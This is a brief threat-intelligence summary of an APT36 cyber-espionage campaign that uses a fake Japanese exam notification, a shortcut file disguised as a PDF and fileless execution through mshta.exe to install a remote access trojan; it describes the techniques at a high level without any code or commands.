A cyber espionage campaign attributed to APT36 has evolved to include sophisticated, fileless malware delivered through deceptive exam-related notifications. This campaign uses trusted Windows tools and adaptive tactics to evade detection and conduct espionage activities against targeted organizations. #APT36 #TransparentTribe
Keypoints
- The attack exploits a seemingly benign notification about a Japanese language exam to deliver malware.
- The malware campaign uses a weaponized Windows shortcut (.LNK) file disguised as a PDF to initiate infection.
- It leverages legitimate Windows tools like mshta.exe for fileless, memory-resident execution to evade detection.
- The malware adapts its behavior based on detected antivirus software, enhancing persistence and stealth.
- Once active, it functions as a Remote Access Trojan, enabling surveillance, data theft, and remote control of infected systems.